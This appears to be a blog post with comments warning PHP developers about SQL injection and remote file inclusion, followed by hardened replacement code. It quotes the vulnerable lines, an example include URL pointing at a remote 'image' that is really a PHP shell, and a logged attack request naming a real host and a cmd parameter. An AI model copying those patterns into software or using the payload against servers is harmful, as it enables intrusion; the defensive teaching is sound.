It works like this: you write dynamic code and allow parameters to be sent to your code. Then, without any kind of filtering or validation, you use those raw values as parameters for your code.
I’ll give you two examples so that you can get the result almost instantly:
Example 1: open up your database
The script would be called as news.php?id=1, which would mean “give me the news whose id equals 1”
Then in news.php you have something like
$result = mysql_query("SELECT * FROM news WHERE id=".$_GET['id']);
This will make it easy even for level 1 script kiddies to practise their exploiter skills. Nothing too serious, you know, they may freely read and modify your data. Child games!
To make sure they get the maximum benefit of their stay in your server, don’t forget to store unencrypted passwords, so when they copy the users table, they can try to log into all the users’ accounts since most of the people use the same password for every online service.
Example 2: open up your file system (and everything else)
You’ve been told about the advantages of using include files. You are not only using include() for the header and footer, but you load each section using something like index.php?section=name_of_the_section
Then in index.php you have this:
include($_GET['section']);
Usually it would be used with values of $_GET['section'] such as ‘clients.htm’, ‘about_us.htm’, ‘our_company.htm’… You name it! But what would you say if a script kiddie went creative and, instead of just entering a simple filename in your server, decided to add an http:// in front of it?
Like for example: index.php?section=http://astrangeserver/somewhere/including/usually/an/image.jpg
PHP will kindly load whatever is at that URL and evaluate the contents as PHP code.
What, evaluate an image? You’ll be surprised.
Try to open that image in your browser. Oh, image.jpg “can’t be displayed by the browser because it contains errors”. Really? Of course, because it’s not meant to be displayed, but to be executed. In fact it is a PHP file which contains code for converting your innocent index.php into a complete control panel from where a cracker can install more stuff on your server, or even try to deface other websites.
So PHP loads it, evaluates it and suddenly there’s a bunch of code ready to be executed at the cracker’s will.
Isn’t it brilliant, amazing, great?
… obviously not!
It’s like eating food from dodgy take-aways without thinking twice. You never know what you eat!
Personally, I’m bored to death of finding in the server logs requests such as index.php?id=http://www.antiqbook.co.uk/map/.xpl/lila.jpg?&cmd=cat%20bugado
And it just shows there are still people tacitly allowing undesirable behaviour to happen on their servers, without giving a damn about it, or even worse, without knowing about it. I wonder if the antiqbook administrators know about this directory with plenty of exploits, remote shells and what not on their server. Or maybe they are just a fake company.
So do us a favour: filter and validate your URL parameters and stop contributing to illegal activities such as spam. Thank you very much.
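As an added example that is not part of the original post, here are the two offending lines hardened in PHP: the id is validated as a positive integer and bound through a prepared statement (PDO is assumed in place of the old mysql_query), and the section name is mapped through a fixed allow-list instead of being handed to include(). The $pdo connection, the sections/ directory and the function names are assumptions.

```php
<?php
// Added example, not the original post's code. Assumes an open PDO
// connection in $pdo; function and variable names are hypothetical.

// news.php: reject anything that is not a positive integer, then bind the
// value as a parameter so it can never alter the SQL statement itself.
function fetch_news(PDO $pdo, array $get): ?array
{
    $id = filter_var($get['id'] ?? '', FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;                      // e.g. "1 OR 1=1" never reaches the DB
    }
    $stmt = $pdo->prepare('SELECT * FROM news WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// index.php: never include() a user-supplied path. The section name is only
// a key into a fixed map; "http://..." or "../" simply is not a known key.
const SECTIONS = [
    'clients'     => 'clients.htm',
    'about_us'    => 'about_us.htm',
    'our_company' => 'our_company.htm',
];

function section_file(array $get): ?string
{
    $name = $get['section'] ?? 'clients';
    if (!array_key_exists($name, SECTIONS)) {
        return null;                      // unknown section: include nothing
    }
    // Assumed layout: the section files live in ./sections/ next to index.php
    return __DIR__ . '/sections/' . SECTIONS[$name];
}

$file = section_file($_GET);
if ($file === null) {
    http_response_code(404);
    exit('Unknown section');
}
include $file;
```

As defence in depth, keeping allow_url_include=Off in php.ini (the default) stops PHP from fetching include() targets over HTTP at all, so a remote file is refused even if some other piece of code still passes raw input to include().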

madgoblin
Great post! :)
Just one comment: Don’t forget to validate and sanitize the values sent in forms to the server. The most common way of doing it (wrong) is to use javascript on the client machine to check each field in the form, but it’s not very secure because we can modify the JS code in many ways to disable the validation.
^o^
sole
Yes, terribly right. There are lots of online shops which rely on that for validating the phone number, e-mail, etc.
If only their developers knew about firebug or the web developer toolbar. Or even curl… As a rule we should NEVER trust external values!
sole
And more directories and places with exploits and nasty stuff:
Courtesy of ip 72.232.138.198 (belonging to Layered Technologies, Inc.) which was proxying using several different ips in several places (maybe using zombie computers?) but with a user agent of Internet Explorer (quite disappointing, if at least it had been curl or something like LWP::Simple, which I found in yesterday’s attack attempt…):